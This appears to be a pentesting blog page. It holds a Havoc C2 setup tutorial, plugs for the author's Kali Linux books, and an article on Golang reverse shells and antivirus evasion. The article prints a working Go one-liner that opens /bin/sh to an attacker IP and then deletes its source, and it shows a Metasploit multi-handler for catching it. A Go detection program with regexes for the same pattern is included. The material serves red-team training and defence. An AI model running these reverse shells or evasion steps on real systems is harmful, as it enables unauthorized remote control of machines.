Tutorial: Havoc C2 on Kali Linux

This is a sneak peek preview of part of a chapter from my new book – “Mastering Command and Control: Exploring C2 Frameworks using Kali Linux”.

Tool GitHub: https://github.com/HavocFramework/Havoc
Tool Wiki: https://havocframework.com/docs/welcome

Havoc is a GUI driven multi-user Command and Control (C2) framework written in Golang, C and ASM. It is easy to use and has many great features making it a great option for Red Teams. It is also quickly becoming the “C2” of choice in online cyber-attacks, so it’s good for Blue Teams to be familiar with it too. 

Havoc C2 – Installing

Havoc is now included in the repositories of the newest version of Kali Linux. It can be installed by just entering the tool name.

Open a Kali Terminal and enter the following commands:

  • sudo apt update
  • sudo apt upgrade
  • havoc (this will prompt you to install it)
  • cd /usr/share/havoc

You need to run Havoc from the install directory, as it uses a config file (havoc.yaotl) in its profiles directory. There are a few settings you can change in the config file, including Host, Port, Users and Passwords, though I will just use the default config for this chapter.

Havoc is made up of two parts, the Team Server and a Client. You need to have both running in separate terminal windows.

Havoc C2 – Start the Team Server

  • Enter "havoc server --profile ./profiles/havoc.yaotl -v"

"-v" starts Havoc in verbose mode. If you want debug information, you can also add "--debug".

Havoc C2 – Start the Client

Now we need to start the client, or the user interface to Havoc.

  • Open a Second Terminal
  • Navigate to “/usr/share/havoc”
  • Enter “havoc client”
  • Click “New Profile”
  • Then click “Connect”

You could also use a user name and password from the profile located at profiles/havoc.yaotl.

Havoc C2 – Create A Listener

First up, we need to create a Listener. A Listener waits for the incoming connection that a target makes when it runs a payload, and establishes the session.

  • Click “View” from the top menu
  • Then, “Listeners”
  • Then, at the bottom of the screen click “Add”

Add a name and select a Payload type. I just used HTTP. Lastly, set the Host IP address and Port.

Click “Save”

Havoc will save and then start the listener.

You can see Havoc’s status in the Event Viewer window.

Havoc C2 – Generating a Payload

Next, we need to make a payload or shellcode for the target to run.

  • Click “Attack” from the top menu and then “Payload”

Havoc gives you several options. We will just take the defaults and choose a Windows Executable for the payload type. You should see your new listener listed. If not, select it from the drop-down box. Make any changes you want (I made none), then click “Generate”. Havoc will create our attack payload. It takes a few seconds to generate, and Havoc will then prompt you to save it.

Now, all you need to do is Copy and Run this file on a target Windows system.

And we have a live session!

This is just the beginning; in the full chapter we delve deeper into controlling the remote session.

Read more on Havoc and on 11 other C2s in my new book!

“Mastering Command and Control” available on Amazon.com

“Mastering Command & Control” Author’s Book Review

My newest book, “Mastering Command & Control – Exploring C2 Frameworks with Kali Linux” is out!

In the ever-evolving landscape of cybersecurity, proficiency in Command and Control (C2) frameworks is not just advantageous – it’s essential. Introducing “Mastering Command & Control,” a comprehensive guide created for security students and professionals looking to increase their knowledge of C2 platforms.

Dive deep into the world of red teaming and penetration testing as you embark on a journey through the industry’s most potent C2 frameworks. From Sliver and Empire to the depths of the renowned Metasploit framework, and more, this book is your path to mastery!

C2s Covered:

  • Villain
  • Havoc C2
  • Sliver
  • Empire & StarKiller
  • Covenant
  • Silent Trinity
  • PoshC2
  • Metasploit
  • With an overview of Merlin, Mythic, Cobalt Strike and Caldera!

You’ll navigate the installation and utilization of each framework, learning quickly with hands on tutorials utilizing the Kali Linux platform. Gain invaluable insights into obtaining remote shells, executing commands on target systems, and exploring similar modules on each framework. With a focus on practicality, each chapter equips you with the skills and knowledge needed to navigate the complex terrain of command and control with confidence.

Whether you’re a novice seeking to lay a solid foundation or a seasoned practitioner aiming to broaden your expertise, “Mastering Command & Control” is your definitive companion.

I wrote this guide as so many students were struggling with learning C2s. Also, many professionals in the field were looking for something to get them up to speed quickly on C2 platforms. Thus, this book was born. I try to use similar commands, modules and techniques across each one, so that the reader can gain familiarity rapidly with each, using the step-by-step, learn-by-doing process that my readers have enjoyed for years.

C2 platforms are so critical, and more so now with the huge explosion of Artificial Intelligence. Though the current C2s aren’t dependent on AI, they soon will be. Make no doubt about it, C2s and AI ARE the future of security. The more familiar you are with them, and the better you know how to use them, the better prepared you will be for the future!

“Mastering Command and Control – Exploring C2 Frameworks with Kali Linux”, available now on Amazon.com!

NEW BOOK: “Password Cracking with Kali Linux”

My #1 New Release, “Password Cracking with Kali Linux” is out! The latest addition to my Security Testing with Kali Linux series is here!

Unlock the secrets of Windows password security with “Password Cracking with Kali Linux,” your ultimate guide to password cracking using Kali Linux. This book provides a comprehensive introduction to the fundamentals of Windows security, offering readers an in-depth exploration of tools, techniques, and strategies for password cracking.

From understanding the basics of Windows security to creating powerful wordlists for cracking tools, this book is a must-have for both novice and experienced cybersecurity enthusiasts. Learn the art of password cracking as you explore the tools, tactics, and techniques used by both security professionals and real-world attackers. This learn by doing book will help you gain hands-on experience in cracking Windows and Linux passwords using Kali Linux.

The latest in my “Security Testing with Kali Linux” series, this book focuses solely on cracking password hashes, a critical skill for all Red Team members, Offensive Security Professionals, Pentesters, and Security Enthusiasts. It is a complete collection of all my writings on Password Cracking, taken from my books and articles, modified with additional new information and tools, and formed into a beginning-to-end book on password cracking.

Key Features:

  1. Fundamental Windows Security Insights: Gain a solid understanding of Windows security protocols, providing a foundation for effective ethical hacking.
  2. Tool and Technique Exploration: Dive into the world of ethical hacking tools and techniques, exploring Kali Linux’s powerful arsenal to crack Windows passwords.
  3. Wordlist Creation Mastery: Master the art of crafting custom wordlists, a crucial skill for optimizing password-cracking success.
  4. Linux Password Cracking: Extend your knowledge beyond Windows and explore the techniques used to crack Linux passwords, adding versatility to your ethical hacking toolkit.
  5. Defense Strategies: Equip yourself with the knowledge to defend against password attacks. Learn essential cybersecurity practices to secure Windows systems effectively.

Whether you’re a cybersecurity enthusiast, IT professional, or aspiring ethical hacker, “Password Cracking with Kali Linux” empowers you to navigate the complex world of password cracking responsibly and ethically. Take your skills to the next level and become a proficient defender against cyber threats with this comprehensive guide.

Check it out on Amazon.com!

Check out the other books in the series!

  1. Security Testing with Raspberry Pi, Second Edition Paperback
  2. Advanced Security Testing with Kali Linux Kindle Edition
  3. Basic Security Testing with Kali Linux, Fourth Edition

Getting Offensive with Golang

Introduction

Creating Reverse Shells and bypassing Anti-Virus (AV) with Golang. Using Golang in security has become very popular over the last few years. In this article I want to cover several existing Golang scripts that you can use to create Reverse Shells and possibly even bypass Anti-Virus.

This is part one of a two-part series. We will start our journey looking at a one-line reverse shell in Go, and then cover a couple of apps that can generate multiple different shells. This article isn’t about writing custom Go scripts or post exploitation – what to do after you get a remote shell. It is simply a quick and dirty overview of some existing Go shellcode for Pentesters and Red Teams.

Swissky’s one-line Go shell is up first. This one-line reverse shell works great against Linux based targets. Next, we will look at Girsh, a menu driven script that can create multiple different reverse shells for both Linux and Windows.

In Part 2, we will look at Go-Shellcode, a very good Go reverse shell. At last testing, with the right payload, it still bypassed most common Windows Anti-Virus products.

As always, this Article is for Educational & Informational Purposes Only. Never try to Access Systems that you do not have Permission to do so.

I used two Kali Linux VMs for this article, one a target and the other an attack system. Golang was already installed on the attacking system. I also used a Windows 11 system and a Windows Server 2022 (not shown) for testing some of the shells.

Swissky Repo – PayloadsAllTheThings, Golang Shell

Tool GitHub Site: https://github.com/swisskyrepo

Swissky’s GitHub site has a one-line reverse shell for Golang that works great on Linux. All you need is a Netcat listener set up on the attacker system; then run the one-liner on the Linux target.

Just set up a Netcat Listener on the Attacking system:

On the target, take the one-line Go payload from Swisskyrepo and enter the attacker IP address. Then, run it on the target system.

echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","[Attacker_IP_Address]:4242");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go

As seen below:

If the target system has Golang installed, we immediately get a shell:
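The one-liner is also a tidy detection target for Blue Teams: every part of it (inline source written to /tmp, the dial-out, a shell with its stdio attached to the socket, the immediate rm) lands in process-execution telemetry. The following Go program is an added example, not code from Swissky's repo or this article; it inspects constructed command-line records (modelled on auditd EXECVE / EDR output, not real data) and flags that pattern, including the cmd.exe and powershell variants the article goes on to mention for Windows targets.

```go
package main

import (
	"fmt"
	"regexp"
)

// Constructed process-execution records (one command line each), modelled on
// auditd EXECVE / EDR output. Not real telemetry.
var SampleCommandLines = []string{
	`echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","10.0.0.5:4242");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go`,
	`go run ./cmd/server`,
	`go run /tmp/build-check.go`,
}

// The three parts of the one-liner (dial out, spawn a shell, attach the
// shell's stdio to the socket) plus two weaker signals around it.
var (
	dialRe   = regexp.MustCompile(`net\.Dial\(\s*"tcp"`)
	shellRe  = regexp.MustCompile(`exec\.Command\(\s*"(/bin/(ba)?sh|cmd(\.exe)?|powershell(\.exe)?)"`)
	stdinRe  = regexp.MustCompile(`\.Stdin\s*=`)
	stdoutRe = regexp.MustCompile(`\.Stdout\s*=`)
	tmpRunRe = regexp.MustCompile(`\bgo\s+run\s+(/tmp|/var/tmp|/dev/shm)/\S+\.go\b`)
	rmAfter  = regexp.MustCompile(`\bgo\s+run\b.*&&\s*rm\s`)
)

// Inspect returns the reasons a command line matches the pattern, nil if none.
func Inspect(cmdline string) []string {
	var reasons []string
	if dialRe.MatchString(cmdline) && shellRe.MatchString(cmdline) &&
		stdinRe.MatchString(cmdline) && stdoutRe.MatchString(cmdline) {
		reasons = append(reasons, "inline Go source dials out and wires a shell's stdio to the socket")
	}
	if tmpRunRe.MatchString(cmdline) {
		reasons = append(reasons, "go run of a source file in a temp directory")
	}
	if rmAfter.MatchString(cmdline) {
		reasons = append(reasons, "source file deleted right after execution")
	}
	return reasons
}

func main() {
	for _, l := range SampleCommandLines {
		if r := Inspect(l); len(r) > 0 {
			fmt.Printf("ALERT %q\n  %.72s\n", r, l)
		}
	}
}
```

The first record trips all three checks, the plain `go run ./cmd/server` trips none, and a `go run` from /tmp alone is a single weaker signal worth correlating rather than alerting on by itself.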

Before we continue, there are several Go reverse shells available online and on GitHub that basically just open a simple remote communication shell to Netcat. You don’t have to use Netcat on the attacker system, you can use the Metasploit Framework to catch this type of basic shell.

It also works for Netcat-like shellcode that is compiled to run on Windows targets. Granted, it won’t be a Meterpreter shell, just a basic shell, but if the target is Windows based you could try the “upgrade shell to meterpreter” module in Metasploit. Windows Defender does catch and block the “upgrade shell to meterpreter” post module, but other AV products may not.

You can learn more about upgrading your shell to meterpreter here – https://docs.metasploit.com/docs/pentesting/metasploit-guide-upgrading-shells-to-meterpreter.html

Let’s take a minute and look at catching a basic Netcat shell with Metasploit.

Catching Netcat (Generic) Shells using Metasploit

You can use the Metasploit framework on your attacker system instead of just using Netcat. To do so, start Metasploit on your attacking system and use a Multi Handler. For a Linux target you will need the “generic/shell_reverse_tcp” payload. Metasploit loads this by default, but I set it manually just to be sure. Then enter your attacker IP address as LHOST and the port used as LPORT. When all is set, enter “exploit”.

As seen below:

Now, run the one-liner Go attack on the target system again. Metasploit acts like Netcat and completes the remote shell.

The process is the same if the target is Windows based and you are using a Windows version of a Netcat-like shell attack. Just change the payload in Multi Handler to the Windows x64 shell.

As seen below:

Notice the only change is switching from the generic shell to the Windows x64 shell. Using the plain reverse shell payloads in Metasploit, you can catch any of the Netcat shells written in any language, and for any target platform.  

Girsh – Golang Interactive Reverse Shell vs Linux

Tool Author: nodauf
Tool GitHub: https://github.com/nodauf/Girsh

Girsh is a quick and easy menu driven remote shell written in Golang. Until recently, the PowerShell module in Girsh did bypass Microsoft Defender and other major AV products. Though Defender catches it now, you may still have some luck with it against other AV products. For this example, we will create a quick Linux shell with it.    

Install & Usage

With Golang installed all you need to do is pull Girsh down from GitHub.

On first run it will download multiple dependencies. It will then display a Girsh prompt.

As seen below:

  • Type “menu” to create a reverse shell
  • Use the arrows to select an interface, then press enter
  • When prompted for a reverse shell type, select “python”

You are presented with multiple Python commands. Copy and run one of them on your target system.

You should immediately get a remote session.

  • To see available sessions, type “sessions”
  • Then connect to the session you want using the “connect ID#” command

As seen below:

You now have a fully interactive remote shell.

In the next part of this article, we will look at using Go-Shellcode, a multi-function Go remote shell that works very well against Windows systems.

If you liked this article, check out my book, “Advanced Security Testing with Kali Linux”, and the just released “Basic Security Testing with Kali Linux, 4th Edition”, both available on Amazon.